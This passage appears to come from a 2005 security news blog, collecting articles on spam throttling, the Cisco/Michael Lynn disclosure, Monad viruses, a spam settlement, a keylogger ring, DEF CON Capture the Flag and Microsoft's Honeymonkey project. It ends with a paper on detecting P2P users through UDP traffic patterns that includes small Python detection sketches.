In fact, Mr. Williamson calls a security feature Microsoft Corp. added to Windows XP last summer, limiting the number of network connections open at one time, a "very weak form of throttling."

Symantec Corp. is applying the same idea to fight spam. Its Security 8100 Series appliance attaches to a corporate network and monitors e-mail traffic. When the device sees large volumes of mail from a single Internet address, it limits the bandwidth allocated to traffic from that address.

This doesn't stop legitimate mail getting through, says Bruce Ernst, group product manager at Symantec, but spammers see outgoing messages backing up on their servers. "Most spammers just start to give up because they can't make their numbers." Mr. Ernst says large companies and ISPs are the major markets for the $4,995 (U.S.) appliance, but didn't say if a version would be made available to smaller organizations.

Dr. Clemens Martin, director of information technology programs at the University of Ontario Institute of Technology in Oshawa, Ont., says he is impressed by the results he has seen from throttling techniques, and the technology "definitely is worthwhile pursuing."

OS exploits are 'old hat'

Analysis - Security issues involving Cisco kit highlighted in Michael Lynn’s presentation at Black Hat are characteristic of networking vendors in general. Cisco is just the most visible of these vendors to target as hackers raise their sights from attacking operating systems towards attacking network infrastructure and database systems, security researchers warn.
According to vulnerability management firm nCircle, virtually all the network vendors tend to run monolithic, closed OSs that are mission-critical for their customers and don't lend themselves well to the simplistic desktop patching models currently in place. nCircle reckons that as Microsoft's security gradually improves, hackers will look to other mechanisms of attack - a trend that puts networking equipment in the firing line.

Rooted routers

Timothy Keanini, CTO at nCircle, said that "as Microsoft raises the bar with countermeasures the threat goes elsewhere". Keanini, who attended Lynn’s presentation, said that it built on other research by German hacker FX into security vulnerabilities in embedded systems such as routers and even printers. Compromised printers could be used to scan for vulnerabilities elsewhere in a network while rooted routers pose an even greater risk.

Cisco controversially slapped a restraining order on Lynn after he gave a talk on security weaknesses with the networking giant's core IOS software at the Black Hat conference in Las Vegas last month. Lynn quit his job at security tools vendor ISS in order to give a presentation about how it might be possible to remotely compromise Cisco routers and run malign code. Cisco said that Lynn had failed to follow approved industry practices in disclosing security vulnerabilities. It also took issue with Lynn's "irresponsible public disclosure of illegally obtained proprietary information".

Database security pitfalls

There's general agreement among security researchers that there's growing interest in the digital underground in developing exploits for network security flaws. Such exploits could be used to carry out denial of service attacks but some researchers reckon database systems offer a more lucrative target. Nigel Beighton, Symantec's director of enterprise strategy, EMEA, said that databases are the repository of sensitive corporate information and therefore a natural place to attack. The issue is compounded by a lack of adequate database security technology and infrequent patching schedules, he added.

Roy Hills, technical director at security consultant NTA Monitor, said that it sees a mixture of networking and software patching vulnerabilities when it carries out penetration testing work on behalf of clients. Security bugs in bespoke web applications are also a frequent, and growing, source of problems. "Understanding the pitfalls of web application security is not as simple as following a recipe," Hills added. ®

Microsoft quells Vista virus concerns

Microsoft has confirmed that a new scripting tool will not ship as part of the next version of its operating system, Windows Vista. The disclosure dispels concerns that a virus writer had created the first "Vista viruses" by targeting a new interactive shell codenamed Monad (or MSH).
MSH was originally scheduled to ship with Windows Vista but it is now more likely that MSH's first public release will be as part of the next edition of Microsoft Exchange, due sometime in the second half of 2006. "Monad will not be included in the final version of Windows Vista," said Stephen Toulouse, a program manager, in a posting to Microsoft's Security Response Centre's blog. "Monad is being considered for the Windows Operating system platform for the next three to five years. So these potential viruses do not affect Windows Vista or any other version of Windows if 'Monad' has not been installed on the system."

"The viruses do not attempt to exploit a software vulnerability and do not encompass a new method of attack," he added.

The posting ended confusion over Monad's possible inclusion in Vista. Toulouse said that the appearance of proof of concept viruses targeting Monad had nothing to do with its omission from Windows Vista. So that's cleared that up then.

Microsoft's posting follows the online publication of five proof of concept viruses, called Danom, targeting Monad and reckoned to be the work of Austrian VXer Second Part To Hell. These, it's now clear, are not Windows Vista viruses but MSH viruses. ®

Former 'Spam King' pays MS $7m to settle lawsuit

Former 'Spam King' Scott Richter has agreed to pay Microsoft $7m to settle an anti-spam lawsuit. The settlement to a December 2003 lawsuit comes a month after Richter - long ranked one of the world's top three spammers - was removed from the Register of Known Spam Operators maintained by the Spamhaus Project. Richter was dropped from the ROKSO list after his outfit OptInRealBig.com cleaned up its act and stopped sending out junk mail that violated US anti-spam rules.
The settlement (announced Tuesday) is conditioned upon dismissal of the bankruptcy cases filed in March by Richter and OptInRealBig at the US Bankruptcy Court in Denver, itself a defensive move prompted by the massive damages a court might have awarded Microsoft if the case had gone to trial. Richter and his company have agreed to pay $7m to Microsoft. The settlement also stipulates that Richter, his company and his affiliates will continue to comply with US federal and state anti-spam laws, such as the CAN-SPAM Act. Richter has also agreed to three years of oversight.

We're in the money

Microsoft has earmarked $5m of the settlement to expand its net security partnerships with governments and law enforcement agencies worldwide through various training, investigative and forensic assistance initiatives. The software giant is giving $1m to New York community centres to spend on computers. Microsoft doesn't say where the other $1m is going but our guess would be legal fees.

Richter was sued by New York State Attorney General Eliot Spitzer and brought to the brink of bankruptcy by Microsoft over allegations he used a network of 500 compromised computers to send millions of junk emails to hapless Hotmail users. Richter settled the NY lawsuit last July by agreeing to comply with CAN-SPAM and to shell out a modest $50K fine but that still left Microsoft's action hanging over his head.

In its lawsuit, Microsoft contended that Richter and his companies violated Washington and federal law by sending junk mail that contained "forged sender names, false subject lines, fake server names, inaccurate and misrepresented sender addresses and obscured transmission paths". Some of these spam messages, touting home loans and the like, were allegedly sent via compromised PCs.

Richter and OptInRealBig.com continue to deny these allegations but the terms of the settlement oblige Richter to provide a canned quote anyway stating that he'd changed his emailing practices "in part" because Microsoft and the New York Attorney General sued him. "In response to Microsoft’s and the New York Attorney General’s lawsuits, we made significant changes to OptInRealBig.com’s emailing practices and have paid a heavy price. I am committed to sending email only to those who have requested it and to complying fully with all federal and state anti-spam laws," Richter said.

Microsoft’s SVP and general counsel, Brad Smith, commented that because of this litigation, Richter had "fundamentally changed his practices and forfeited ill-gotten gains". He added that Microsoft will continue to combat spam through a combination of technology, consumer education and enforcement. ®

Microsoft trying to track down women engineers

Microsoft has vowed to track how many women it has certified as engineers after its ignorance of candidates’ genders hampered an academic investigation of lady-friendly training methods.

Open University researchers wanted to know how many women trained in the UK as Microsoft Certified Systems Engineers (MCSE), how many took the exams, and how many subsequently took jobs.

But, Microsoft - which is providing official support for the British government’s Computer Clubs for Girls scheme - first said it couldn’t give out a gender breakdown of its certified engineer roster, before admitting it simply didn’t know.

Dr. Debbie Ellen, an OU research fellow and co-author of the report, said: “Microsoft said it doesn’t give out this information because of data privacy laws”.

Ellen went straight to the Information Commissioner, the UK’s enforcer of data protection laws. The IC gave her a special ruling that showed Microsoft’s co-operation would not offend the law.

She showed this to her Microsoft contacts, Ram Dhaliwal, training and certification manager at Microsoft, and Bronwyn Kunhardt, Microsoft UK’s head of corporate reputation and diversity.

“Neither of them responded,” she said.

Dhaliwal stuck to his data privacy defence when approached by The Register but, when pressed, admitted Microsoft could not share the data because it does not track the gender of its engineering trainees.

“The MCSE goals are owned by the individual, so from a data privacy point of view we don’t hold anything,” he said.

“We hold the data at a world-wide level. The only information we have is how many MCSEs, how many MCEs et cetera. But not gender,” he added.

Dhaliwal did admit, however, that the data might exist.

Kunhardt, who five months ago took the newly created diversity post at Microsoft UK, vowed to investigate the matter.

“I’m trying to get it put through that we go back through all the MCS applications we have to collect the gender data,” she added.

“I’m trying to get them to collect a whole host of diversity data,” Kunhardt added.

The Open University study - Training and Employment of Women ICT Technicians: a report of the JIVE MCSE project - sought to determine if women-only training environments would help more women become Microsoft certified engineers.

It was not able to draw its conclusion without comparing the success rate of the women-only programme it studied (http://www.jivepartners.org.uk) with the success rate of women who take the usual route into Microsoft engineering.

Male training environments can confirm women’s suspicions that IT is an industry for boys. Anecdotal evidence in the OU report found that women were grateful for JIVE’s women-only environment.

Women reported that their training was hindered on regular training courses because they were intimidated by overbearing men.

“Whenever I go on a training course I am normally the only female there!...Whereas the Women’s Workshop...there’s no testosterone flying around for competition,” said one trainee.

“Comparing it to courses where men have been involved...they tend to take over and I sort of sit there like a shy violet at the back and not say anything, whereas with a group of women, it seems to be much easier to make a fool of yourself sometimes and not worry about it,” said another.

Of those women who do go into IT, most get stuck in lowly jobs. Two-thirds of database assistants and clerks are women, according to the ONS, while 80 to 89 per cent of more desirable posts are held by men.

Rachel Burnett, a vice president of the British Computer Society, who is opening a new forum for women in the Autumn, said: “We need to collect information on women in IT.”

“If we had better strategic information that would help us know how we could increase access for women,” she added.

Since 1997 the proportion of women working in IT has fallen by more than a fifth, from 27 per cent to 21 per cent, according to the Office of National Statistics (ONS).

For computer engineering jobs the proportion of women in training is as low as five to 10 per cent, according to Azlan Professional services. Fewer are thought to take the exams and subsequently get jobs.®

ID theft automated using keylogger Trojan

Anti-spyware researchers have uncovered a massive identity theft ring linked to keylogging software. The malware was discovered by Patrick Jordan of Sunbelt Software while doing research on the infamous CoolWebSearch application but the key logger itself is not CWS. It's far nastier.
During the course of infecting a machine, Jordan discovered that the machine became a spam zombie that was also sending data back to a remote server. He found that thousands of infected machines are contacting a US-based server daily and a portion of these are writing to a keylogger file, which is periodically harvested by cybercriminals. "The types of data in this file are pretty sickening to watch. You have search terms, social security numbers, credit cards, logins and passwords, etc," Sunbelt president Alex Eckelberry writes.

Sunbelt has contacted some of the affected individuals to warn them their personal details had been exposed. It has also informed the FBI. It remains unclear if the keylogger is directly related to CWS or not. Sunbelt advises consumers to use a personal firewall to prevent the key logger from "phoning home".

The use of key logging software on an industrial scale is rare but not unprecedented. Malware can be programmed to send back sensitive information to designated servers, in some cases logging into the servers using passwords written into viral code. Security researchers able to reverse engineer items of malware can extract this password and location information and use it to monitor hacker activity. ®

Annual hacking game teaches security lessons

LAS VEGAS -- The weekend-long Capture the Flag tournament stressed code auditing as a measure of hacking skill this year, a move that emphasized more real-world skills, but not without controversy.

The annual Capture the Flag tournament at DEF CON has always attracted participants from a variety of backgrounds, looking to try their hands at online attack and defense. Under a new set of organizers this year, the game pitted teams and individuals against each other to find and exploit vulnerabilities in their opponents' systems to score points. The game, dubbed "WarGamez," put more emphasis on real-world skills compared to previous years, said Giovanni Vigna, associate professor of computer science at the University of California at Santa Barbara and the leader of team Shellphish, which won the event.

"The game required skills that are also required by both security researchers and hackers, such as ability to analyze attack vectors, understanding and automating attacks, finding new, unpredictable ways to exploit things," Vigna said. "It's about analyzing the security posture of a system that is given to you and about which you initially know nothing."

The latest incarnation of the game--run by a group of security professionals who asked to be identified only by their group name, Kenshoto--attracted students, military computer experts, security professionals and hobbyist hackers. For the teams, the controversy surrounding security researcher Michael Lynn's outing of a high-profile vulnerability in Cisco Systems' routers mattered little. Finding vulnerabilities in each other's servers became the focus of their world.

In previous years, the game allowed each side to run their own server, and required that certain services be available. This year, the organizers ran a central server on which each team's virtual server ran.

The move was not without controversy, however, as it removed from the contest any teams that concentrated on defending their systems by using a specialized operating system, said Crispin Cowan, director of software engineering for Novell's Linux division, SUSE.

"Prior games involved both attackers and defenders working on the problem, but because Kenshoto took total control of the reference servers to be defended, there is very little defense that can be deployed," Cowan said. "Their scoring system also made defense essentially worthless other than to deny other teams points."

Cowan competed for several years as the leader of a team fielded by secure Linux operating system vendor Immunix, which was bought by Novell in May. Porting services over to its security-enhanced operating system became a signature strategy of the team.

The Capture the Flag game is supposed to measure security researchers' and hackers' abilities to attack and defend systems, said one of the organizers, not necessarily be a test of products.

"We did intentionally de-emphasize defense, because it is a hacking competition, after all," said the organizer. By agreement, the group that ran the game adopted the name Kenshoto and would only speak anonymously. "However, defensive skills were tested."

Some teams had success deploying Tripwire, a data-integrity checker that can find changed files, and monitoring traffic with an intrusion detection system, he said. A knowledgeable defender could also lock down the systems, further hardening them. Moreover, the amount of uptime for each service directly affected the score, so defending the applications that ran the services became a key strategy, the organizers said.

In the end, however, the game focused on finding and exploiting vulnerabilities.

"What it takes to be an elite hacker is to find vulnerabilities in custom software," said the Kenshoto member. "It is not code auditing per se. They have to reverse engineer, and we have made it difficult to reverse engineer."

The Kenshoto group ran all the teams' virtual servers on a single machine using a technique known as "jailing," which limits each team or individual to separate directories on the master system. The computer ran the FreeBSD operating system, and the utilities and services were written in Python, Java and C. The group also ran an in-game auction site known as eDay.

Each team's authentication token, or totem, was placed on the bottom of a can of Tab, which the team was expected to guard.

While a few individuals and teams used the eDay auction site, most of the deals for items were done behind the scenes, according to one member of Kenshoto. One team's can of Tab, which held the team's secret code on the bottom, went for 101 beers, the organizer said.

The teams each sought to score points by keeping services running, stealing or overwriting digital tokens on each server, and producing advisories with working exploit code. Rooting the main Kenshoto mainframe would earn massive points, according to the rules, but a failed attempt would penalize the team "back into the stone age."

Auditing did play a big role in the game's strategy, said the Kenshoto organizers, because finding flaws is a major factor in attack and defense in the real online world.

"The auditing people did as part of the game was similar to the job of anyone trying to find risks in third party software, be it a black hat or someone trying to determine whether third-party software is safe to integrate with an existing system," said one organizer.

Notable differences, however, include the time pressure, the fact that participants not only had to find a vulnerability but exploit the flaw, and that the teams did not have access to any source code.

The winning strategy balanced finding flaws with hardening the system's services, said Vigna of the winning team Shellphish.

"On the defense side, we had people responsible for monitoring--both manually and using automated tools--incoming traffic and running processes to find out how we were attacked," he said. "We also had people that make sure that our services were up an running ... Finally, we had people who would choose a service and try to find exploitable vulnerabilities."

In the end, however, Novell's Cowan remained unconvinced that focusing on finding flaws in arbitrary systems had much to do with real-world network security.

"The Kenshoto game is not invalid, it just focuses specifically on code auditing to the exclusion of all else," Cowan said. "If Kenshoto's game of this year persists, then ... anyone else with any significant interest in defense (will not participate), and the game will be entirely dominated by code analysis players."

Correction: The original article incorrectly identified the programming languages used to write the applications for the Capture the Flag game. The languages are Python, Java, and C.

Microsoft's "monkeys" find first zero-day exploit

Microsoft's experimental Honeymonkey project has found almost 750 Web pages that attempt to load malicious code onto visitors' computers and detected an attack using a vulnerability that had not been publicly disclosed, the software giant said in a paper released this month.

Known more formally as the Strider Honeymonkey Exploit Detection System, the project uses automated Windows XP clients to surf questionable parts of the Web looking for sites that compromise the systems without any user interaction. In the latest experiments, Microsoft has identified 752 specific addresses owned by 287 Web sites that contain programs able to install themselves on a completely unpatched Windows XP system.

Honeymonkeys, a name coined by Microsoft, modify the concept of honeypots--computers that are placed online and monitored to detect attacks.

"The honeymonkey client goes (to malicious Web sites) and gets exploited rather than waiting to get attacked," said Yi-Min Wang, manager of Microsoft's Cybersecurity and Systems Management Research Group. "This technique is useful for basically any company that wants to find out whether their software is being exploited this way by Web sites on the Internet."

The experimental system, which SecurityFocus first reported on in May, is one of the software giant's many initiatives to make the Web safer for users of the Windows operating system. Online fraudsters have become more savvy about fooling users, from more convincing phishing attacks to targeting individuals who likely have access to high-value data. Some statistical evidence has suggested that financial markets are holding software makers such as Microsoft responsible for such problems.

The software giant has not focused on any single strategy to secure its customers. A year ago, the company released a major update, known as Service Pack 2, to its Windows XP operating system--an update that focused almost exclusively on security. The company has also started working more closely with the independent security researchers and hackers who find the flaws in its operating system, and offering rewards for information on the virus writers who have historically attacked its software.

The honeymonkey project, first discussed at the Institute of Electrical and Electronics Engineers' Symposium on Security and Privacy in Oakland, California in May, is the latest attempt by the software giant to detect threats to its customers before the threats become widespread. The honeymonkeys consist of virtual machines running different patch levels of Windows. The "monkey" programs browse a variety of Web sites looking for sites that attempt to exploit browser vulnerabilities.

Security researchers have given the initiative high marks.

"In terms of detection capabilities, it's a really elegant hack," said Dan Kaminsky, principal security researcher for Doxpara Research. "The antivirus model -- scan for dangerous patterns -- can't find previously unknown attacks. ... No, the best way to find out if a web page, if executed, would attack the browser is to spawn a browser and let it execute potentially hostile code."

New tactics like honeymonkeys will be a useful way to stave off the dangers of the Internet, said Lance Spitzner, president of the Honeynet Project, which creates software and tools for administering false networks of systems that appear to be vulnerable targets.
Where the Honeynet Project focuses on fake servers to lure in attackers, client-side honeypots, what Microsoft has called honeymonkeys, are important as well, Spitzner said.

"As the bad guys continue to adapt and change, so too must we," he said.

In the first month, Microsoft's legion of honeymonkeys found 752 different addresses at 287 Web sites that exploited various vulnerabilities in Windows XP, according to a paper published last week. The researchers determine whether each monkey's system has been compromised by using another ongoing project, the Strider Flight Data Recorder, which detects changes to system files and registries. The Monkey Controller kills the infected virtual machine and restarts a new one that picks up scanning the original monkey's list. Another monkey program, running a different patch level of Windows, tries the original Internet address to detect the strength of the exploit.

In early July 2005, the project discovered its first exploit for a vulnerability that had not been publicly disclosed, the researchers said in the paper. The attack used the JView profiler vulnerability that Microsoft announced later in July. Known as "zero-day" exploits, such attack methods could be especially pernicious if widely used before Microsoft updated its user base with protections. In fact, the network of Web sites that use such attacks, which researcher Wang has dubbed the Exploit-Net, seem to share exploits. Within two weeks of the initial discovery, 40 of the 752 Web pages adopted the exploit.

Microsoft believes that the sites could act as canaries in a coal mine, alerting the company to dangerous zero-day exploits before the attacks gained widespread usage.

"Our conjecture is that these Web sites are the popular ones, because we could find them in one month, and so, if we kept monitoring the sites, we could catch new exploits very fast, because any new exploit would quickly be picked up by these sites," said Wang.

Microsoft's Security Response Center, the group that acts on vulnerability information, will use the honeymonkey system to keep it apprised of future zero-day attacks, said Stephen Toulouse, program manager for the MSRC.

"It is not just important for us to know that... but for customers to know that it is being exploited, so they can get patches quickly," Toulouse said.

Among the researchers' other findings is that even a partially patched version of Windows XP Service Pack 2 blocks the lion's share of attacks, cutting the number of sites that could successfully compromise a system from 287 for an unpatched system to 10 for a partially patched Windows XP SP2 system. A fully patched Windows XP SP2 system could not be compromised by any Web sites, according to the group's May-June data. (The zero-day exploit of javaprxy.dll happened after this data set.)

Microsoft plans to continue the honeymonkey research to collect new information on threats. In the end, such research could help put the sources of such attacks behind bars. After investigating sites that use exploits to compromise systems, Microsoft plans to forward the information to law enforcement, said Scott Stein, an attorney with Microsoft's Internet Safety Enforcement Team and former U.S. Department of Justice prosecutor.

"Our mission is to keep the Internet safe--for that mission, this is a great lead generation tool," Stein said.

Sunday, August 07, 2005

Identifying P2P users using traffic analysis

With the emergence of Napster in the fall of 1999, peer-to-peer (P2P) applications and their user base have grown rapidly in the Internet community. With the popularity of P2P and the bandwidth it consumes, there is a growing need to identify P2P users within the network traffic.

In this paper the author will propose a new method based on traffic behavior that helps identify P2P users, and even helps to distinguish what types of P2P applications are being used.
Current Technology
When it comes to identifying P2P users, currently there are only two choices: port based analysis and protocol analysis. Here is a brief review of both.
Port based analysis
Port based analysis is the most basic and straightforward method to detect P2P users in network traffic. It is based on the simple concept that many P2P applications have default ports on which they function. When these applications are run, they use these ports to communicate with the outside world. The following is an example list:

Limewire 6346/6347 TCP/UDP
Morpheus 6346/6347 TCP/UDP
BearShare default 6346 TCP/UDP
Edonkey 4662/TCP
EMule 4662/TCP 4672/UDP
Bittorrent 6881-6889 TCP/UDP
WinMx 6699/TCP 6257/UDP

To perform port based analysis, administrators just need to observe the network traffic and check whether there are connection records using these ports. If a match is found, it may indicate P2P activity. Port based analysis is almost the only choice for network administrators who don't have special software or hardware (such as an IDS) to monitor traffic.

Port matching is very simple in practice, but its limitations are obvious. Most P2P applications allow users to change the default port numbers by manually selecting whatever port(s) they like. Additionally, many newer P2P applications are more inclined to use random ports, thus making the ports unpredictable. Also, there is a trend for P2P applications to masquerade their traffic behind well-known application ports such as port 80. All these issues make port based analysis less effective.
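For illustration, here is a minimal Python sketch of such a check (a sketch only: the record format is an assumption of convenience, and the port table simply transcribes the example list above):

# Port based P2P detection sketch (illustrative only).
# Assumes connection records are available as (src_ip, dst_ip, dst_port, proto)
# tuples, e.g. parsed from gateway logs.
P2P_PORTS = {
    ("TCP", 6346): "Limewire/Morpheus/BearShare",
    ("UDP", 6346): "Limewire/Morpheus/BearShare",
    ("TCP", 6347): "Limewire/Morpheus",
    ("UDP", 6347): "Limewire/Morpheus",
    ("TCP", 4662): "Edonkey/EMule",
    ("UDP", 4672): "EMule",
    ("TCP", 6699): "WinMx",
    ("UDP", 6257): "WinMx",
}
BT_PORTS = range(6881, 6890)  # Bittorrent 6881-6889 TCP/UDP

def classify(src_ip, dst_ip, dst_port, proto):
    if (proto, dst_port) in P2P_PORTS:
        return P2P_PORTS[(proto, dst_port)]
    if dst_port in BT_PORTS:
        return "Bittorrent"
    return None

for rec in [("10.0.0.5", "1.2.3.4", 4662, "TCP")]:
    app = classify(*rec)
    if app:
        print(f"{rec[0]} -> {rec[1]}:{rec[2]} possible P2P: {app}")

Note that such a script inherits every weakness described above: a user who moves a client off its default port simply disappears from the report.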
Protocol analysis
Despite the poor results found using simple port matching, an administrator has another choice: application layer protocol analysis.

With this approach, an application or piece of equipment monitors traffic passing through the network and inspects the data payload of the packets against previously defined P2P application signatures. Many of today's commercial and open source P2P application identification solutions are based on this approach, including the L7-filter, Cisco's PDLM, Juniper's netscreen-IDP, Alteon Application Switches, Microsoft common application signatures, and NetScout. They each do their detection work by running regular expression matches on the application layer data, in order to determine whether a specific P2P application is being used.
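The core of such products can be pictured with a small Python sketch (the patterns below are simplified stand-ins loosely based on well-known protocol handshakes, not the actual signature sets of the products named above):

import re

# Simplified payload signatures (cf. the open source L7-filter project).
SIGNATURES = {
    "Gnutella":   re.compile(rb"^GNUTELLA (CONNECT|OK)"),
    "Bittorrent": re.compile(rb"^\x13BitTorrent protocol"),
    "Edonkey":    re.compile(rb"^[\xe3\xc5\xd4]"),  # common eDonkey/eMule markers
}

def identify_payload(payload: bytes):
    for app, sig in SIGNATURES.items():
        if sig.search(payload):
            return app
    return None

print(identify_payload(b"\x13BitTorrent protocol" + b"\x00" * 8))  # Bittorrent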

Because protocol analysis focuses on the packet payload and raises alerts only on a definite match, client-side tricks such as running on non-default or dynamic ports will not help P2P applications avoid detection. Using this approach, the result is normally more accurate and believable, but it still has some shortcomings. Here are some points to remember with protocol analysis of P2P networks:

* P2P applications are evolving continuously, and therefore signatures can change. Static signature based matching requires new signatures to remain effective when these changes occur.
* With more and more P2P identification and control products on the market, P2P developers tend to tunnel around any controls placed in their way. They could easily achieve this by encrypting the traffic, such as by using SSL, making protocol analysis much more difficult.
* Signature-based identification means that the product should read and process all network traffic, which brings up the issue of how to maintain network stability in a large network. The product may burden network equipment heavily or even cause network failures. If it works inline, what will you do when the product fails?
* Signature-based identification at the application level (L7) is also highly resource-intensive. The higher the network bandwidth, the more cost and resources you need to inspect it. Suppose you must inspect a 1Gbit or even 10Gbit network link -- how much investment must you make to get an appropriate product?

Most importantly, if your organization cannot afford the special appliances or applications that perform protocol analysis, is port matching your only alternative? Fortunately, the answer is no. An approach based on traffic behavior patterns proves to be both functional and cost-effective.
Traffic behavior
Network traffic information can usually be retrieved easily from various network devices without affecting network performance or service availability too much. For small or medium networks, administrators can rely on their gateway or perimeter equipment logs. For larger networks and ISPs, administrators can enable the Netflow function on their routers or switches to export network traffic records.
Although network traffic information is coarse to some degree, there is valuable information inside the traffic, and useful patterns can be uncovered. Looking at host UDP sessions is one good example of this.
Identifying P2P users
The author of this paper has found that a unique traffic behavior -- a UDP connection pattern -- exists with P2P applications. This can be used to process network traffic and find out which hosts are running P2P applications in a decentralized network structure. And all that is needed are the network traffic records.

What exactly does it mean to look at a UDP connection pattern, and how can it help us? Before answering these questions, let's review the first popular P2P application, Napster.
Centralized, decentralized and hybrid P2P networks
Napster, written by Shawn Fanning, was first launched in May 1999 and was the first generation of a P2P network. Napster's network structure was centralized, which means it was made up of two elements: central index servers and peers. The central index servers were set up by Napster and maintained the shared music file information of every online peer. When an active peer wanted to download a music file, it sent an inquiry to Napster's central index server, and the latter looked up the request in its database and sent back a list of which peers had the desired music files. The peer could then make direct connections to the peers in the list to get the file.

The network structure of Napster had an Achilles' heel -- it was highly dependent on the static central server. If the central server went down, the network would collapse. This was shown by the actions of the recording industry, which forced the original Napster to be shut down.

The Napster case illustrates the vulnerability of a centralized network structure and greatly affected subsequent P2P applications. For legal, security, scalability, anonymity and other reasons, more and more P2P applications nowadays work in a totally or partially decentralized network structure, or are moving in that direction. Major P2P file-sharing networks and protocols, such as Edonkey2k, FastTrack, Gnutella, Gnutella2, Overnet and Kad, all use this concept.

Here the author must make it clear that Bittorrent is not a general purpose P2P network, although it is a popular P2P application. It still needs tracker servers; because the network structure of Bittorrent is only partially decentralized in this way, the technique discussed in this article can't be used to identify Bittorrent users.

Decentralized means a network structure with no dedicated central index servers; it is the trend for P2P evolution. Today, there are many P2P camps using their own networks and protocols, but normally their network structures are totally or partially decentralized. Some P2P applications, such as EMule and Edonkey, support fully decentralized protocols such as Kademlia, which need no servers at all. And as a partially decentralized model, hybrid decentralized networks have won broad support from various P2P applications and are thus recognized as the most popular P2P network model.

In a hybrid decentralized network, there are still central servers, but they are no longer dedicated and static. Instead, some peers with more power (CPU, disk, bandwidth, and active time), called ultrapeers (or supernodes), automatically take over the central index server functions. Every ultrapeer is elected from the normal peers, and each serves a group of normal peers. The ultrapeers communicate with each other to form the backbone of the hybrid decentralized network. New ultrapeers are continuously added when appropriate peers join the network, and ultrapeers are removed when they leave it.

In order to join the network, a peer must find a way to connect with one or a few of the live ultrapeers. Peers get the ultrapeer list by some means, such as a bootstrap list stored in the program or a download from a special web site. After connecting to a proper ultrapeer, apart from the normal file transfer work, the P2P application must interact with the P2P network to stay connected and live happily in the network: uploading information to the server, checking the status of the ultrapeer to which it is connected, getting the most current available ultrapeers, comparing the situations of available ultrapeers, actively switching to a better ultrapeer, searching for files, probing the status of file suppliers, storing available ultrapeers for future use, and so on. In short, besides the real file transfer traffic itself, peers need to send out many control packets (probes, notifications and other packets) to various different hosts to keep up with the changing network environment in real time. This is the first key element of our traffic behavior identification: peers need to send out many control-purpose packets to interact with the decentralized network during their lifetime.
UDP connection patterns
Today almost all P2P applications using a decentralized structure have a built-in module to fulfill this interaction work, because there are many control-purpose packets that need to be sent out to many destinations. A great deal of the modern P2P networks and protocols select UDP as the carrying protocol.

Why do they select UDP? UDP is simple, effective and low-cost. It does not need to guarantee packet delivery, establish connections, or maintain connection state. All these features make UDP fit for fast delivery of data to many destinations -- just what P2P applications need. Inspecting different P2P applications carefully, you will find most of the modern decentralized P2P applications adopt a similar network behavior. When they start up, they create one or several UDP sockets to listen on, and then communicate with abundant outside addresses during their lifetime by using these UDP ports to assist their interaction in the P2P world. This is the second key element of our traffic behavior identification: peers keep using one or several UDP ports to make connections to fulfill the control work.

Now, let's turn to a popular P2P application, Edonkey2000, to see how it can be identified.

Edonkey2000 UDP traffic example

The following is a trace file of Edonkey's outgoing UDP traffic. The output displayed here is sanitized, so it is only a fraction of the captured traffic. In fact, for this example there were 390 records in just two minutes. For example purposes, the source address is replaced with x and the first octet of each destination address is replaced with y.

11:24:19.650034 IP x.10810 > y.34.233.22.8613: UDP, length: 25
11:24:19.666047 IP x.2587 > y.138.230.251.4246: UDP, length: 6
11:24:19.666091 IP x.10810 > y.127.115.17.4197: UDP, length: 25
11:24:19.681433 IP x.10810 > y.76.27.4.4175: UDP, length: 25
11:24:19.681473 IP x.2587 > y.28.31.240.4865: UDP, length: 6
11:24:19.696907 IP x.2587 > y.162.178.102.4265: UDP, length: 6
......
11:24:20.946921 IP x.2587 > y.250.47.34.4665: UDP, length: 6
11:24:20.962509 IP x.2587 > y.152.93.254.4665: UDP, length: 6
11:24:20.978275 IP x.2587 > y.28.31.241.5065: UDP, length: 6
11:24:20.993871 IP x.2587 > y.135.32.97.580: UDP, length: 6
11:24:21.009621 IP x.2587 > y.149.102.1.4246: UDP, length: 6
11:24:29.681224 IP x.10810 > y.32.97.189.5312: UDP, length: 4
11:24:29.696903 IP x.10810 > y.10.34.181.7638: UDP, length: 4
11:24:29.716503 IP x.10810 > y.26.234.251.12632: UDP, length: 4
......
11:26:20.291874 IP x.10810 > y.19.149.0.21438: UDP, length: 19

From the output, we can see that all traffic is coming from two source ports, UDP 2587 and UDP 10810 (these ports are randomly selected by Edonkey, and the port numbers on different hosts will be different). The destination IP addresses are diverse. In fact, Edonkey uses one port to send out server status requests to the Edonkey servers, and uses the other port for connections, IP queries, searches, publishing and some other work.
Finding the pattern
A study of some other decentralized P2P applications, such as BearShare, Skype, Kazaa, EMule, Limewire, Shareaza, Xolox, MLDonkey, Gnucleus, Sancho, and Morpheus, leads to a similar result. All these applications have the same connection pattern: they use one or several UDP ports to communicate with many outside hosts during their lifetime. Described at the network layer, the pattern can be summarized as:

For a period of time (x), from one single IP, fixed UDP port -> many destination IPs (y), fixed or random UDP ports

Experience shows that when x equals five and y equals three, administrators scanning for P2P applications will get a satisfying result. Administrators can change the x and y values to get more precise or coarser results according to their requirements.

In practice, we can export network connection records from the corresponding equipment and use a database and shell scripts to process them. For every given minute, if the result shows that a host sends out some number of UDP packets to different hosts from a fixed source port, it is highly probable that the host is a P2P host.
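As a minimal sketch of that processing step (the flow-record format here is an illustrative assumption; in practice the records would come out of the Netflow database), the following Python fragment flags hosts that contact at least y distinct destinations within one minute from a single fixed UDP source port:

from collections import defaultdict

Y_THRESHOLD = 3  # distinct destination IPs per minute (the 'y' above)

def find_p2p_hosts(flows):
    # flows: iterable of (minute, src_ip, src_port, dst_ip, proto) tuples
    dests = defaultdict(set)
    for minute, src_ip, src_port, dst_ip, proto in flows:
        if proto == "UDP":
            dests[(minute, src_ip, src_port)].add(dst_ip)
    # A DNS, game or media server also fans out like this; whitelist hosts
    # that never send traffic on ports other than their functional port.
    return {(ip, port) for (_, ip, port), d in dests.items()
            if len(d) >= Y_THRESHOLD}

flows = [(0, "10.0.0.5", 2587, "1.1.1.1", "UDP"),
         (0, "10.0.0.5", 2587, "2.2.2.2", "UDP"),
         (0, "10.0.0.5", 2587, "3.3.3.3", "UDP")]
print(find_p2p_hosts(flows))  # {('10.0.0.5', 2587)}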

The author of this article set up a test environment on one of China's largest ISP nodes. The network connection records were exported from the router as Netflow data and stored in a MySQL database. With the help of a little script to process all the data, many hosts were identified as P2P peers, and some interesting new, locally developed P2P applications were also discovered.
Dealing with false positives
